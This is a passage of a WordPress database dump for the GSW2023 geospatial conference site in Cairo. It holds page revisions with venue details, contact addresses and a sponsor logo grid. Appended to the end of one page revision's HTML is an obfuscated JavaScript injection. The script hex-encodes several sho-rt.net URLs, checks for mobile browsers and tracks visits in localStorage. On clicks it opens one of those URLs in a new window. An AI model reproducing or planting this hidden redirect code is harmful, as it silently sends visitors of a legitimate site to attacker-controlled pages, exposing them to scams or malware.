#ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-27 10:02:08','2023-07-27 10:02:08','',3066,'https://gsw2023.com/?p=5052',0,'revision','',0),
(5053,1,'2023-07-27 12:00:24','2023-07-27 12:00:24','','5X5cm PIESAT Logo','','inherit','open','closed','','5x5cm-piesat-logo','','','2023-07-27 12:00:24','2023-07-27 12:00:24','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo.png',0,'attachment','image/png',0),
(5054,1,'2023-07-27 12:03:33','2023-07-27 12:03:33','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner 